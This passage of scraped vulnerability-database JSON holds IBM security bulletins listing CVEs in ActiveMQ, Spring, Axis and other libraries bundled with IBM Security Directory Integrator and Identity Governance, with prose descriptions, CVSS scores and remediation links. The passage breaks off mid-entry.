https://exchange.xforce.ibmcloud.com/vulnerabilities/95377](<https://exchange.xforce.ibmcloud.com/vulnerabilities/95377>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2021-23926](<https://vulners.com/cve/CVE-2021-23926>) \n** DESCRIPTION: **Apache XMLBeans is vulnerable to a denial of service, caused by an XML external entity (XXE) error when processing XML data. By sending a specially-crafted XML request, a remote attacker could exploit this vulnerability to cause a denial of service or obtain sensitive information. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/194818](<https://exchange.xforce.ibmcloud.com/vulnerabilities/194818>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L) \n \n** CVEID: **[CVE-2018-1272](<https://vulners.com/cve/CVE-2018-1272>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote authenticated attacker to gain elevated privileges on the system, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to gain elevated privileges. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/141286](<https://exchange.xforce.ibmcloud.com/vulnerabilities/141286>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2019-0227](<https://vulners.com/cve/CVE-2019-0227>) \n** DESCRIPTION: **Apache Axis is vulnerable to server-side request forgery, caused by an expired hard coded domain, used in a default example service named StockQuoteService.jws. By using a man-in-the-middle attack to force an HTTP request, a remote attacker could exploit this vulnerability to conduct an SSRF attack, allowing the attacker to execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/159283](<https://exchange.xforce.ibmcloud.com/vulnerabilities/159283>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2011-2730](<https://vulners.com/cve/CVE-2011-2730>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to obtain sensitive information, caused by an error when handling the Expression Language. An attacker could exploit this vulnerability to obtain classpaths and other sensitive information. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/69688](<https://exchange.xforce.ibmcloud.com/vulnerabilities/69688>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N) \n \n** CVEID: **[CVE-2010-1622](<https://vulners.com/cve/CVE-2010-1622>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by an error in the mechanism to use client provided data to update the properties of an object. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/59573](<https://exchange.xforce.ibmcloud.com/vulnerabilities/59573>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2016-0782](<https://vulners.com/cve/CVE-2016-0782>) \n** DESCRIPTION: **Apache ActiveMQ is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the web based administration console. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/111420](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111420>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2015-6524](<https://vulners.com/cve/CVE-2015-6524>) \n** DESCRIPTION: **Apache ActiveMQ is vulnerable to a brute force attack, caused by an error in the LDAPLoginModule implementation. An attacker could exploit this vulnerability using the wildcard in usernames to obtain user credentials. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/106187](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106187>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2015-5254](<https://vulners.com/cve/CVE-2015-5254>) \n** DESCRIPTION: **Apache ActiveMQ could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the classes that can be serialized in the broker. An attacker could exploit this vulnerability using a specially crafted serialized Java Message Service (JMS) ObjectMessage object to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/109632](<https://exchange.xforce.ibmcloud.com/vulnerabilities/109632>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2018-11775](<https://vulners.com/cve/CVE-2018-11775>) \n** DESCRIPTION: **Apache ActiveMQ Client could allow a remote attacker to conduct a man-in-the-middle attack, caused by a missing TLS hostname verification. An attacker could exploit this vulnerability to launch a man-in-the-middle attack between a Java application using the ActiveMQ client and the ActiveMQ server. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/149705](<https://exchange.xforce.ibmcloud.com/vulnerabilities/149705>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2014-3576](<https://vulners.com/cve/CVE-2014-3576>) \n** DESCRIPTION: **Apache ActiveMQ is vulnerable to a denial of service, caused by an error in the processControlCommand function in broker/TransportConnection.java. A remote attacker could use the shutdown command to shutdown the service. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/107290](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107290>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2020-13947](<https://vulners.com/cve/CVE-2020-13947>) \n** DESCRIPTION: **Apache ActiveMQ is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the message.jsp script. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196373](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196373>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2015-1830](<https://vulners.com/cve/CVE-2015-1830>) \n** DESCRIPTION: **Apache ActiveMQ could allow a remote attacker to traverse directories on the system, caused by an error in the fileserver upload/download functionality. By placing a jsp file in the admin console, an attacker could exploit this vulnerability to execute arbitrary shell commands on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/105644](<https://exchange.xforce.ibmcloud.com/vulnerabilities/105644>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2016-3088](<https://vulners.com/cve/CVE-2016-3088>) \n** DESCRIPTION: **Apache ActiveMQ could allow a remote attacker to execute arbitrary code on the system, caused by an error in the Fileserver web application. By sending a specially crafted HTTP PUT request and an HTTP MOVE request, an attacker could exploit this vulnerability to create an arbitrary file and execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/113414](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113414>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2012-6092](<https://vulners.com/cve/CVE-2012-6092>) \n** DESCRIPTION: **Apache ActiveMQ is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by multiple vectors. A remote attacker could exploit this vulnerability using various parameters in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/83720](<https://exchange.xforce.ibmcloud.com/vulnerabilities/83720>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2013-3060](<https://vulners.com/cve/CVE-2013-3060>) \n** DESCRIPTION: **Apache ActiveMQ is vulnerable to a denial of service, caused by the failure to require authentication, by the Web console. By sending specially-crafted HTTP requests, an attacker could exploit this vulnerability to obtain sensitive information or cause a denial of service. \nCVSS Base score: 6.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/83719](<https://exchange.xforce.ibmcloud.com/vulnerabilities/83719>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:P) \n \n** CVEID: **[CVE-2011-4905](<https://vulners.com/cve/CVE-2011-4905>) \n** DESCRIPTION: **Apache ActiveMQ is vulnerable to a denial of service, caused by an error in the failover mechanism when handling an openwire connection request. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause the broker service to crash. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/71620](<https://exchange.xforce.ibmcloud.com/vulnerabilities/71620>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n \n** CVEID: **[CVE-2015-7559](<https://vulners.com/cve/CVE-2015-7559>) \n** DESCRIPTION: **Apache ActiveMQ client is vulnerable to a denial of service, caused by a remote shutdown command in the ActiveMQConnection class. By sending a specific command, a remote authenticated attacker could exploit this vulnerability to cause the application to stop responding. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/170664](<https://exchange.xforce.ibmcloud.com/vulnerabilities/170664>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0222](<https://vulners.com/cve/CVE-2019-0222>) \n** DESCRIPTION: **Apache ActiveMQ is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted MQTT frame, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/158686](<https://exchange.xforce.ibmcloud.com/vulnerabilities/158686>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2014-3600](<https://vulners.com/cve/CVE-2014-3600>) \n** DESCRIPTION: **Apache ActiveMQ could allow a remote attacker to obtain sensitive information, caused by an XML External Entity Injection (XXE) error when processing XML data. By sending specially-crafted XML data to specify an XPath based selector, an attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/100722](<https://exchange.xforce.ibmcloud.com/vulnerabilities/100722>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N) \n \n** CVEID: **[CVE-2020-1941](<https://vulners.com/cve/CVE-2020-1941>) \n** DESCRIPTION: **Apache ActiveMQ is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the admin GUI. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/181957](<https://exchange.xforce.ibmcloud.com/vulnerabilities/181957>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2013-1879](<https://vulners.com/cve/CVE-2013-1879>) \n** DESCRIPTION: **Apache ActiveMQ is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when handling cron jobs. A remote attacker could exploit this vulnerability using specific parameters to inject malicious script into a Web page which would be executed in a victim's Web browser within the security context of the hosting Web site, once the page is viewed. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85586](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85586>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2013-1880](<https://vulners.com/cve/CVE-2013-1880>) \n** DESCRIPTION: **Apache ActiveMQ is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the demo/portfolioPublish script. A remote attacker could exploit this vulnerability using the refresh parameter in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/103075](<https://exchange.xforce.ibmcloud.com/vulnerabilities/103075>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2014-3612](<https://vulners.com/cve/CVE-2014-3612>) \n** DESCRIPTION: **Apache ActiveMQ could allow a remote authenticated attacker to bypass security restrictions, caused by an error in the LDAPLoginModule implementation. By sending an empty password, an attacker could exploit this vulnerability to bypass the authentication mechanism of an application using LDAPLoginModule and assume the role of another user. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/100723](<https://exchange.xforce.ibmcloud.com/vulnerabilities/100723>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2014-8110](<https://vulners.com/cve/CVE-2014-8110>) \n** DESCRIPTION: **Apache ActiveMQ is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/100724](<https://exchange.xforce.ibmcloud.com/vulnerabilities/100724>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2020-13920](<https://vulners.com/cve/CVE-2020-13920>) \n** DESCRIPTION: **Apache ActiveMQ is vulnerable to a man-in-the-middle attack, caused by improper authentication validation when connecting to the JMX RMI registry. By creating another server to proxy the original, an attacker could exploit this vulnerability to launch a man-in-the-middle attack and gain access to the communication channel between endpoints to obtain user credentials or further compromise the system. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/188067](<https://exchange.xforce.ibmcloud.com/vulnerabilities/188067>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2016-6810](<https://vulners.com/cve/CVE-2016-6810>) \n** DESCRIPTION: **Apache ActiveMQ is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/119699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2018-8006](<https://vulners.com/cve/CVE-2018-8006>) \n** DESCRIPTION: **Apache ActiveMQ is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the queues.jsp file. A remote attacker could exploit this vulnerability using the QueueFilter parameter in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/148808](<https://exchange.xforce.ibmcloud.com/vulnerabilities/148808>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2012-6551](<https://vulners.com/cve/CVE-2012-6551>) \n** DESCRIPTION: **Apache ActiveMQ is vulnerable to a denial of service, caused by the enablement of a sample web application by the default configuration. By sending specially-crafted HTTP requests, an attacker could exploit this vulnerability to consume broker resources and cause a denial of service. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/83718](<https://exchange.xforce.ibmcloud.com/vulnerabilities/83718>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n \n** CVEID: **[CVE-2012-5784](<https://vulners.com/cve/CVE-2012-5784>) \n** DESCRIPTION: **Apache Axis 1.4, as used in multiple products, could allow a remote attacker to conduct spoofing attacks, caused by the failure to verify that the server hostname matches a domain name in the subject's Common Name (CN) field of the X.509 certificate. An attacker could exploit this vulnerability using man-in-the-middle techniques to spoof an SSL server and launch further attacks against a vulnerable target. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/79829](<https://exchange.xforce.ibmcloud.com/vulnerabilities/79829>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2016-0734](<https://vulners.com/cve/CVE-2016-0734>) \n** DESCRIPTION: **Apache ActiveMQ could allow a remote attacker to hijack the clicking action of the victim, caused by the failure to set the X-Frame-Options header in HTTP responses by the Administrative Web console. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim's click actions. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/111421](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111421>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Security Directory Integrator | 7.2.0 \n \n\n\n## Remediation/Fixes\n\n**IBM encourages customers to update their systems promptly.**\n\nReleased Product(s)| Version(s)| Remediation \n---|---|--- \nIBM Security Directory Integrator | 7.2.0.9| [https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Tivoli/Security+Directory+Integrator&release=7.2.0&platform=All&function=fixId&fixids=7.2.0-ISS-SDI-FP0009&includeRequisites=1&includeSupersedes=0&downloadMethod=http&login=true](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Tivoli/Security+Directory+Integrator&release=7.2.0&platform=All&function=fixId&fixids=7.2.0-ISS-SDI-FP0009&includeRequisites=1&includeSupersedes=0&downloadMethod=http&login=true>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-13T05:47:28", "type": "ibm", "title": "Security Bulletin: IBM Security Directory Integrator is affected by multiple security vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2011-2730", "CVE-2011-4905", "CVE-2012-5784", "CVE-2012-6092", "CVE-2012-6551", "CVE-2013-1879", "CVE-2013-1880", "CVE-2013-3060", "CVE-2013-4152", "CVE-2013-6429", "CVE-2013-7315", "CVE-2014-0054", "CVE-2014-3576", "CVE-2014-3596", "CVE-2014-3600", "CVE-2014-3612", "CVE-2014-8110", "CVE-2015-1830", "CVE-2015-5211", "CVE-2015-5254", "CVE-2015-6524", "CVE-2015-7559", "CVE-2016-0734", "CVE-2016-0782", "CVE-2016-3088", "CVE-2016-6810", "CVE-2016-9878", "CVE-2018-11775", "CVE-2018-1270", "CVE-2018-1271", "CVE-2018-1272", "CVE-2018-8006", "CVE-2018-8032", "CVE-2019-0222", "CVE-2019-0227", "CVE-2020-13920", "CVE-2020-13947", "CVE-2020-1941", "CVE-2020-5421", "CVE-2021-23926"], "modified": "2023-02-13T05:47:28", "id": "818B433278D5E2420F4213C71C6036E7BA5EA3C87CB6A3BC405627E0A3B9E898", "href": "https://www.ibm.com/support/pages/node/6955033", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-23T21:49:21", "description": "## Summary\n\nIBM has announced a release for IBM Security Identity Governance and Intelligence (IGI) in response to multiple security vulnerabilities. There are multiple vulnerabilities fixes to open source libraries distributed with IGI, other less secure algorithms for crypto, xss attacks and click jacking attacks.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-0124](<https://vulners.com/cve/CVE-2018-0124>) \n**DESCRIPTION:** Cisco Unified Communications Domain Manager could allow a remote attacker to execute arbitrary code on the system, caused by insecure key generation during application configuration. By sending arbitrary requests using the insecure key, an attacker could exploit this vulnerability to bypass security protections, gain elevated privileges and execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/139282> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2018-0125](<https://vulners.com/cve/CVE-2018-0125>) \n**DESCRIPTION:** Cisco RV132W ADSL2+ Wireless-N VPN and RV134W VDSL2 Wireless-AC VPN Routers could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete input validation on user-controlled input in an HTTP request in the Web interface. By sending a specially crafted HTTP request, an attacker could exploit this vulnerability to execute arbitrary code with root privileges or cause the device to reload. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/138770> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2015-5237](<https://vulners.com/cve/CVE-2015-5237>) \n**DESCRIPTION:** Google Protocol Buffers could allow a remote attacker to execute arbitrary code on the system, caused by an integer overflow in MessageLite::SerializeToString. A remote attacker could exploit this vulnerability to execute arbitrary code on the vulnerable system or cause a denial of service. \nCVSS Base Score: 6.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/105989> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L)\n\n**CVEID:** [CVE-2013-4517](<https://vulners.com/cve/CVE-2013-4517>) \n**DESCRIPTION:** Apache Santuario XML Security for Java is vulnerable to a denial of service, caused by an out of memory error when allowing Document Type Definitions (DTDs). A remote attacker could exploit this vulnerability via XML Signature transforms to cause a denial of service. \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/89891> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n**CVEID:** [CVE-2014-3596](<https://vulners.com/cve/CVE-2014-3596>) \n**DESCRIPTION:** Apache Axis and Axis2 could allow a remote attacker to conduct spoofing attacks, caused by and incomplete fix related to the failure to verify that the server hostname matches a domain name in the subject''s Common Name (CN) field of the X.509 certificate. By persuading a victim to visit a Web site containing a specially-crafted certificate, an attacker could exploit this vulnerability using man-in-the-middle techniques to spoof an SSL server. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/95377> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)\n\n**CVEID:** [CVE-2012-5784](<https://vulners.com/cve/CVE-2012-5784>) \n**DESCRIPTION:** Apache Axis 1.4, as used in multiple products, could allow a remote attacker to conduct spoofing attacks, caused by the failure to verify that the server hostname matches a domain name in the subject''s Common Name (CN) field of the X.509 certificate. An attacker could exploit this vulnerability using man-in-the-middle techniques to spoof an SSL server and launch further attacks against a vulnerable target. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/79829> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)\n\n**CVEID:** [CVE-2013-2186](<https://vulners.com/cve/CVE-2013-2186>) \n**DESCRIPTION:** Apache commons-fileupload could allow a remote attacker to overwrite arbitrary files on the system, caused by a NULL byte in the implementation of the DiskFileItem class. By sending a serialized instance of the DiskFileItem class, an attacker could exploit this vulnerability to write or overwrite arbitrary files on the system. \nCVSS Base Score: 6.4 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/88133> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:P)\n\n**CVEID:** [CVE-2016-3092](<https://vulners.com/cve/CVE-2016-3092>) \n**DESCRIPTION:** Apache Tomcat is vulnerable to a denial of service, caused by an error in the Apache Commons FileUpload component. By sending file upload requests, an attacker could exploit this vulnerability to cause the server to become unresponsive. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/114336> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n**CVEID:** [CVE-2016-1000031](<https://vulners.com/cve/CVE-2016-1000031>) \n**DESCRIPTION:** Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/117957> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2014-0050](<https://vulners.com/cve/CVE-2014-0050>) \n**DESCRIPTION:** Apache Commons FileUpload, as used in Apache Tomcat, Solr, and other products is vulnerable to a denial of service, caused by the improper handling of Content-Type HTTP header for multipart requests by MultipartStream.java. An attacker could exploit this vulnerability using a specially crafted Content-Type header to cause the application to enter into an infinite loop. \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/90987> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n**CVEID:** [CVE-2013-4517](<https://vulners.com/cve/CVE-2013-4517>) \n**DESCRIPTION:** Apache Santuario XML Security for Java is vulnerable to a denial of service, caused by an out of memory error when allowing Document Type Definitions (DTDs). A remote attacker could exploit this vulnerability via XML Signature transforms to cause a denial of service. \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/89891> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n**CVEID:** [CVE-2013-2172](<https://vulners.com/cve/CVE-2013-2172>) \n**DESCRIPTION:** Apache Santuario XML Security for Java could allow a remote attacker to conduct spoofing attacks, caused by the failure to restrict canonicalization algorithms to be applied to the CanonicalizationMethod parameter. An attacker could exploit this vulnerability to spoof the XML signature. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/85323> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)\n\n**CVEID:** [CVE-2016-3092](<https://vulners.com/cve/CVE-2016-3092>) \n**DESCRIPTION:** Apache Tomcat is vulnerable to 